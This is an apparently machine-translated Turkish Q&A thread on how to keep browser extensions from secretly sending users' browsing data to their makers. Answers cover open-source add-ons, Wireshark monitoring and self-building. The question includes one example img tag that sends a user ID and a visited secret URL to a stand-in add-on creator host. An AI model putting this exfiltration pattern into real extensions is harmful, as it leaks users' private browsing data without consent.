Tarayıcı eklentilerinin “evdekilere telefon etmesini” önle


0

Prensip olarak, herhangi bir tarayıcı eklentisi, tarayıcı geçmişi, web postası veya diğer hassas verileri toplayarak beni gözetleyebilir. AFAIKS, ya bu verileri kullanarak ya XMLHttpRequest()da fetch()ya da DOM'u değiştirerek yaratıcısına geri gönderebilir , örneğin:

<img src="http://addon-creators-page.com/?userid=uniqueId#https://sensitive-page.com/secret-link-i-visited"/>

Eklenti oluşturucunun sayfasına, istediği verileri gönderebilme olanağına sahip bir HTTP isteğini tetikleme. Ancak, tüm eklentilerin HTTP istekleri yapması veya DOM üzerinde değişiklik yapması gerekmez.

Dolayısıyla soru:

Bazı tarayıcılar için, bir eklentinin erişebileceği JavaScript işlevini, özellikle de DOM manipülasyonu ve HTTP istekleri için kısıtlayan bir çözüm var mı?

Yanıtlar:


2

Emin değilim, ama tarayıcınıza bağlı. Yalnızca açık kaynaklı eklentiler kullanabilirsiniz; bu, telefonlarını evde olup olmadığını kontrol etmenizi sağlar. Ayrıca, tarayıcı işlemi tarafından ziyaret ettiğiniz web sitesi dışındaki bir IP'ye gönderilen istekleri aramak için Wireshark gibi bir şey kullanabilirsiniz. Ayrıca, Firefox kullanıyorsanız, telemetriyi devre dışı bırakmadığınız sürece ve:: config konusunda başka bir seçeneğe inandığım sürece, Mozilla'ya telefon etmek için çok fazla telefon var. Diğer seçeneği de unutuyorum ama burada bulabilirsiniz . Bir eklentinin evden telefon etmesini nasıl durduracağımı bilmiyorum, sanırım Firefox’u özel olarak oluşturmayı deneyebilir ve bir şekilde web eklentileri göndermelerini engellemek için eklentilerin çalıştırılma şeklini değiştirebilirsin. Bu çoğu eklentiyi işe yaramaz çünkü işe yarayacak web istekleri göndermek zorunda kalıyorlardı.

Açık kaynaklı bir addon'un tahrif edilmediğini doğrulamak için, onu kendiniz derleyebilirsiniz. Bu eğitim , Firefox eklentilerini derleyebilecek jpm'nin nasıl kurulacağını gösterir. Jpm'yi yükledikten sonra çalıştırın:

jpm xpi

Eklenti kaynak dizininde bir xpi uzantısı dosyası oluşturmak için. Ardından, takması gereken xpi'yi açın. Muhtemelen size güvenilmez olduğunu söyleyecektir, çünkü derlendi ve imzalanmadı ya da Mozilla eklenti web sitesinde. Bu, çok eski olmadıkça, çoğu uzantı için çalışmalıdır.


İyi cevap. Benim için çözüm, sadece açık kaynaklı eklentiler kullanmak (ve ayrıca açık kaynaklı tarayıcı) ve ikili kodun tahrif edilmediğinden emin olmaktır.
Marc.2377

Başlangıçta sorumumda açık kaynaklı bir eklentinin tahrif edilmediğini nasıl doğrulayacağımı soran başka bir bölüm daha vardı - Sanırım bunu geri ekleyeceğim.
Thomas W.
Sitemizi kullandığınızda şunları okuyup anladığınızı kabul etmiş olursunuz: Çerez Politikası ve Gizlilik Politikası.
Licensed under cc by-sa 3.0 with attribution required.